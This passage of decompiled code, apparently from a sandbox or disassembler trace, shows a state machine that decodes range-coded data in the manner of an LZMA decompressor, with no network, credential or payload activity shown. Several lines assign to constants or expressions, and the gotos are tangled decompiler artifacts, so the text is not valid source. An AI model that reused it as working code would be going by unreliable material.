											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
